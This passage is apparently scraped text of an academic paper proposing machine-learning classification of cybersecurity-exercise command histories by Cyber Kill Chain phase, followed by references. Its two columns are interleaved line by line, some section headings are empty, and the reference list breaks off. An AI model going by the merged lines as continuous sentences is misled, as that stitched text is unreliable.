Professional Documents
Culture Documents
2023153344
2023153344
3. PROPOSED ASSESSMENT SYSTEM data splitting, where the dataset is divided into training and
testing sets. The training set is used to train the classification
model, while the testing set is used to evaluate the model’s
In cybersecurity exercises, it is crucial to measure the skill set performance. The fifth step is model construction, where the
of individuals in order to assess their capabilities and iden- selected machine learning algorithms are trained on the train-
tify areas for improvement. One way to measure an individ- ing set and optimized using a grid search approach. We em-
ual’s skill set is by looking at each phase of the attack they ployed five baseline machine learning algorithms, including
are performing in the exercise. As mentioned earlier, the Cy- K-Nearest Neighbors (KNN), Random Forest (RF), Multino-
ber kill chain is a framework that breaks down the various mial Naive Bayes (MBN), Logistic Regression (LR), and En-
stages of a cyber attack into seven phases, each utilizing dif- semble for benchmarking in addition to our diffusion model
ferent sets of commands from an attacker’s perspective. In for classification. Finally, the sixth step involves evaluating
order to measure an individual’s skill set, we are proposing the performance of the trained model on the testing set. The
a system that can fetch the attacker’s command line history evaluation metrics used in this study included accuracy, preci-
from a system and use different machine learning classifica- sion, recall, and F1-score. The trained model predicts which
tion algorithms to classify the attacker’s use of commands in of the seven stages (figure 5) of the Cyber kill Chain pro-
solving particular challenges. By classifying an individual’s cess the command-line data belongs to. These stages include
use of commands during each phase of the Cyber kill Chain, reconnaissance, weaponization, delivery, exploitation, instal-
we can measure their skill set in cybersecurity exercises and lation, command and control, and action on objectives.
identify areas for improvement. The system would work by
collecting the command line history of an attacker during a
4.1. Data Collection
cybersecurity exercise and then using machine-learning algo-
rithms to classify the commands used by the attacker during To identify the skill sets of the participants, more than 40,000
each phase of the Cyber kill Chain. Once the commands have commands were collected from several participants involved
been classified, the system could generate a skill for solving in cybersecurity exercises. Only ten thousand commands
the challenge that provides insights into the individual’s skill were labelled using the Cyber kill chain classes. The dataset
set and areas for improvement. was developed by Švábenskỳ et al. in [19].
Fig. 4. Distributions of Classes with Respect to Train Test
Split
5. PROPOSED MODEL
6. CONCLUSION
tematic literature review,” Virtual Reality & Intelligent Journal of Information Security and Applications, vol.
Hardware, vol. 4, no. 3, pp. 189–209, 2022. 57, pp. 102722, 2021.
[2] Lucas McDaniel, Erik Talvi, and Brian Hay, “Cap- [10] Muhammad Mudassar Yamin and Basel Katt, “Cyber
ture the flag as cyber security introduction,” in 2016 security skill set analysis for common curricula develop-
49th hawaii international conference on system sciences ment,” in 14th International Conference on Availability,
(hicss). IEEE, 2016, pp. 5479–5486. Reliability and Security, 2019, pp. 1–8.
[3] Stela Kucek and Maria Leitner, “An empirical survey [11] Tarun Yadav and Arvind Mallari Rao, “Technical as-
of functions and configurations of open-source capture pects of cyber kill chain,” in Security in Computing
the flag (ctf) environments,” Journal of Network and and Communications: Third International Symposium,
Computer Applications, vol. 151, pp. 102470, 2020. SSCC 2015, Kochi, India, August 10-13, 2015. Proceed-
[4] Erik Moore, Steven Fulton, and Dan Likarish, “Eval- ings 3. Springer, 2015, pp. 438–452.
uating a multi agency cyber security training program [12] Eric M Hutchins, Michael J Cloppert, Rohan M Amin,
using pre-post event assessment and longitudinal anal- et al., “Intelligence-driven computer network defense
ysis,” in Information Security Education for a Global informed by analysis of adversary campaigns and intru-
Digital Society: 10th IFIP WG 11.8 World Conference, sion kill chains,” Leading Issues in Information Warfare
WISE 10, Rome, Italy, May 29-31, 2017, Proceedings & Security Research, vol. 1, no. 1, pp. 80, 2011.
10. Springer, 2017, pp. 147–156. [13] Samaher Al-Janabi and Ibrahim Al-Shourbaji, “A study
[5] Muhammad Mudassar Yamin, Ankur Shukla, Mohib of cyber security awareness in educational environment
Ullah, and Basel Katt, “Adapt-automated defence train- in the middle east,” Journal of Information & Knowl-
ing platform in a cyber range,” in International Confer- edge Management, vol. 15, no. 01, pp. 1650007, 2016.
ence on Information Systems and Management Science. [14] Ludwig Slusky and Parviz Partow-Navid, “Students in-
Springer, 2022, pp. 184–203. formation security practices and awareness,” Journal of
[6] Muhammd Mudassar Yamin and Basel Katt, “Detecting Information Privacy and Security, vol. 8, no. 4, pp. 3–
malicious windows commands using natural language 26, 2012.
processing techniques,” in Innovative Security Solutions [15] Dania Aljeaid, Amal Alzhrani, Mona Alrougi, and
for Information Technology and Communications: 11th Oroob Almalki, “Assessment of end-user susceptibil-
International Conference, SecITC 2018. Springer, 2019, ity to cybersecurity threats in saudi arabia by simulating
pp. 157–169. phishing attacks,” Information, vol. 11, no. 12, pp. 547,
[7] William Aubrey Labuschagne and Marthie Grobler, 2020.
“Developing a capability to classify technical skill levels [16] Muhammad Mudassar Yamin and Basel Katt, “Model-
within a cyber range,” in ECCWS 2017 16th European ing attack and defense scenarios for cyber security ex-
Conference on Cyber Warfare and Security. Academic ercises,” in 5th interdisciPlinary cyber research confer-
Conferences and publishing limited, 2017, p. 224. ence, 2019, p. 7.
[8] Muhammad Mudassar Yamin, Mohib Ullah, Habib Ul- [17] Valdemar Švábenskỳ, Jan Vykopal, Pavel Čeleda,
lah, Basel Katt, Mohammad Hijji, and Khan Muham- Kristián Tkáčik, and Daniel Popovič, “Student as-
mad, “Mapping tools for open source intelligence with sessment in cybersecurity training automated by pat-
cyber kill chain for adversarial aware security,” Mathe- tern mining and clustering,” Education and Information
matics, vol. 10, no. 12, pp. 2054, 2022. Technologies, vol. 27, no. 7, pp. 9231–9262, 2022.
[9] Muhammad Mudassar Yamin, Mohib Ullah, Habib Ul- [18] Kaie Maennel, “Learning analytics perspective: Evi-
lah, and Basel Katt, “Weaponized ai for cyber attacks,” dencing learning from digital datasets in cybersecurity
exercises,” in 2020 IEEE European Symposium on Secu- ARPN Journal of Engineering and Applied Sciences,
rity and Privacy Workshops (EuroS&PW). IEEE, 2020, vol. 10, no. 14, pp. 5947–5953, 2015.
pp. 27–36. [31] David D Lewis, “Naive (bayes) at forty: The indepen-
[19] Valdemar Švábenskỳ, Jan Vykopal, Pavel Seda, and dence assumption in information retrieval,” in European
Pavel Čeleda, “Dataset of shell commands used by par- conference on machine learning. Springer, 1998, pp. 4–
ticipants of hands-on cybersecurity training,” Data in 15.
Brief, vol. 38, pp. 107398, 2021. [32] Thorsten Joachims, “Text categorization with support
[20] Richard Weiss, Franklyn Turbak, Jens Mache, and vector machines: Learning with many relevant fea-
Michael E Locasto, “Cybersecurity education and as- tures,” in European conference on machine learning.
sessment in edurange,” IEEE Security & Privacy, vol. Springer, 1998, pp. 137–142.
15, no. 03, pp. 90–95, 2017. [33] Baoxun Xu, Xiufeng Guo, Yunming Ye, and Jiefeng
[21] Jelena Mirkovic, Aashray Aggarwal, David Weinman, Cheng, “An improved random forest classifier for text
Paul Lepe, Jens Mache, and Richard Weiss, “Using ter- categorization.,” J. Comput., vol. 7, no. 12, pp. 2913–
minal histories to monitor student progress on hands-on 2920, 2012.
exercises,” in Proceedings of the 51st ACM technical [34] Omer Sagi and Lior Rokach, “Ensemble learning: A
symposium on computer science education, 2020, pp. survey,” Wiley Interdisciplinary Reviews: Data Min-
866–872. ing and Knowledge Discovery, vol. 8, no. 4, pp. e1249,
[22] Margus Ernits, Kaie Maennel, Sten Mäses, Toomas 2018.
Lepik, and Olaf Maennel, “From simple scoring towards
a meaningful interpretation of learning in cybersecurity
exercises,” in ICCWS 2020 15th International Confer-
ence on Cyber Warfare and Security. Academic Confer-
ences and publishing limited, 2020, p. 135.
[23] Sergio Caltagirone, Andrew Pendergast, and Christo-
pher Betz, “The diamond model of intrusion analysis,”
Tech. Rep., Center For Cyber Intelligence Analysis and
Threat Research Hanover Md, 2013.
[24] Blake E Strom, Andy Applebaum, Doug P Miller,
Kathryn C Nickels, Adam G Pennington, and Cody B
Thomas, “Mitre att&ck: Design and philosophy,” Tech-
nical report, 2018.
[25] Sindhu Abro, Sarang Shaikh, Zahid Hussain Khand,
Ali Zafar, Sajid Khan, and Ghulam Mujtaba, “Au-
tomatic hate speech detection using machine learning:
A comparative study,” International Journal of Ad-
vanced Computer Science and Applications, vol. 11, no.
8, 2020.
[26] Juan Ramos et al., “Using tf-idf to determine word rel-
evance in document queries,” in Proceedings of the first
instructional conference on machine learning. Citeseer,
2003, vol. 242, pp. 29–48.
[27] Rosie Dunford, Quanrong Su, and Ekraj Tamang, “The
pareto principle,” 2014.
[28] Xizewen Han, Huangjie Zheng, and Mingyuan Zhou,
“Card: Classification and regression diffusion models,”
arXiv preprint arXiv:2206.07275, 2022.
[29] Naeem Seliya, Taghi M Khoshgoftaar, and Jason
Van Hulse, “A study on the relationships of classifier
performance metrics,” in 2009 21st IEEE international
conference on tools with artificial intelligence. IEEE,
2009, pp. 59–66.
[30] L Mary Gladence, M Karthi, and V Maria Anu, “A
statistical comparison of logistic regression and differ-
ent bayes classification methods for machine learning,”